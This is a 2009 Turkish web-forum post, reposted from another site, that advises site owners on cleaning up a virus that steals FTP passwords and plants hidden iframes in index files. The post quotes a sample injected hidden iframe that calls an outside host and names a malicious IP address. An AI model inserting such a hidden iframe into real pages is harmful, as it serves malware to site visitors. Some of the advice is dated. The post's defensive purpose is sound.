Sayfa: [1]   Aşağı git
Bu Konuyu GönderYazdır
Gönderen Konu: Sitelere bulaşan iframe kodları ve öneriler  (Okunma Sayısı 2201 defa)
0 Üye ve 1 Ziyaretçi konuyu incelemekte.
turkoder
Adnan Yıldız
Yönetici
Yeni Üye
*****

Karma +0/-0
Çevrimdışı Çevrimdışı

Mesaj Sayısı: 7



« : 10 Haziran 2009, 21:15:01 »

Bu konu tüm site sahiplerini ilgilendirdiği için paylaşmak istedim.
Bilgipasaji.com sitesinden alıntı yapılmıştır.

Öncelikle sitenizin güvenliği için sizinde güvende olmanız lazım, çünkü sitenize ftp den giren sizsiniz

Makinenizi düzenli zamanlarda taramadan geçirmelisiniz

Crackli yazılım kullanmamalısınız bağlantılar için en iyisi ücretsiz ve sürekli güncellenen filezilla dır
Alıntı
<iframe src=’ttp://11.111..111/logo/index.php’ width=’1′ height=’1′ style=’visibility: hidden;’></iframe>

Ve Sadece www/public htm/ dizinine değil diğer bütün klasörülerin içinde bulunan index.php , index.html , index.htm ,
default.asp 'in içinede atıyor..
Şimdiye kadar bir çok başlık gördüm bu şekilde bu virüslerden yakınan o yüzden bu yazıyı yazma gereği duydum...

Virüs size nasıl bulaşır ?

başka kişinin sitesine bulaşmışsa ve sizde o siteye girdiyseniz üstelik hiç bir antivirüs yüklü değilse bilgisayarınıza;
Bilinki o virüs artık sizinde bilgisayarınızda ve girdiğiniz bütün ftp'lere girmeye başlayacaktır..

Peki Virüs Sizin Bilgisayarınıza Bulaştı ve bunun farkına vardınız ne yapmamız gerekir ?

Sadece ftp bilgilerinizi alabildiği için hemen dosyalarınızı pc'ye atıp içindeki iframe kodlarını silin ve tekrar ftp'den
upload edin. Sonra hiç vakit kaybetmeden cpanel/plesk panelinize girin ve şifrenizi değiştirin.
Bu işlemleri yaptıktan sonra sakın ftp'den giriş yapmayın. Çünkü ftp'den giriş yaptığınızda değiştirdiğiniz şifreyide
alarak tekrar dosyalarıza iframe atmaya başlayacaktır.. Bu işlemleride yaptıktan sonra bilgisayarıza format atin..

Virüs Bana bulaşmadı Nasıl korunabilirim ?

Filezilla veya cuteftp kullanarak serverinize bağlanın, index.php ,index.htm, index.html, default.asp Bütün klasörlerdeki
bu saydığım uzantılı sayfalarınızın chmod değerlerini 444 yapın.
Bilgisayarınıza Nod32, Panda veya Kaspersky kurun
( ben Kaspersky kullanıyorum ve çoğu sitede virüs yakaladı ama bana bulaşmadı) Bilgisayarınızı güvene alın.
Her ftpye girdikten sonra direk cpanelden yada plesk paneden girerek ftp şifrenizi değiştirin.
Birde bilgisayarınıza Ad-Aware SE Personal 'i kurun iki günde bir tarama yaptırın.

************************************************** ********

Herhangi bir web sayfanızdan virüs önce bilgisayarınıza sızıyor ve daha sonra
FTP benzeri program ile sitenize bulaşıyor. Haliyle bu şekilde her yere yayılmaya başlıyor.
virüs bi süre sonra masaüstünüze update.exe diye bi virüs ekleyip pc'ye zarar vermeye başlıyormuş.

Çözüm için ne yapabiliriz?

Öncelikle ilgisayarınızda dosya bulma menüsünden cd Win.Agent.pz(ntos.exe) bulduğunuzda
hemen silin. Daha sonra antitrojan ve antivirüsler ile bilgisayarınızı tarayın.
Bu işlemlerden sonra FTP'yi kullanıp dosyaları kontrol edin.

Diğer bir alternatif olarak;

Sitenizde bulunan dosyaları FTP yoluyla bilgisayarınıza indirip belirtilen
iframe kodlarının olup olmadığını kontrol kontrol ederek virüs taramasından geçirin.
Güvende olduğunuzu hissediyorsanız Daha sonra dosyaları FTP'den tekrar sitenize atın.
Yada Cute FTP kullanıyorsanız Ctrl-F kısayılu ile arama menüsünü açarak
sitenizte 81.95.145.240 ip numarasını arayın.

işlem sonucu dosyaların cmod ayarlarını kontrol ederek ilgili dosyaların ayarlarını 444 yapın.

Ayrıca tarayıcı olarak Firefox kullanmanın bu tip saldırıları önleyeceğini düşünüyorum.

iframe virüsünün bulaştığı, yani uyarı veren dosyada aşağıdaki satırlara benzer kodlar bulunur.

Son zamanlarda adres kısmı biraz değişikliğe uğradı. Fakat bu kod genelde sayfanın en sonunda olur.

yani </html> den sonra yada önce.

Kodu tamamen silip kaydetmeniz yeterli olacaktır. Ama eğer bilgisayarınızda bir antivirüs yoksa (avast yada nod32) bu iki programdan birini yükleyip tarama yaptırın.

İlgili sitedeki topic :
----------------------------
http://www.bilgipasaji.com/forum/hosting-genel-bilgi-395/287768-sitelere-bulasan-iframe-kodlari-ve-oneriler.html
Moderatöre Bildir   Logged
Sayfa: [1]   Yukarı git
Bu Konuyu GönderYazdır
 
Gitmek istediğiniz yer: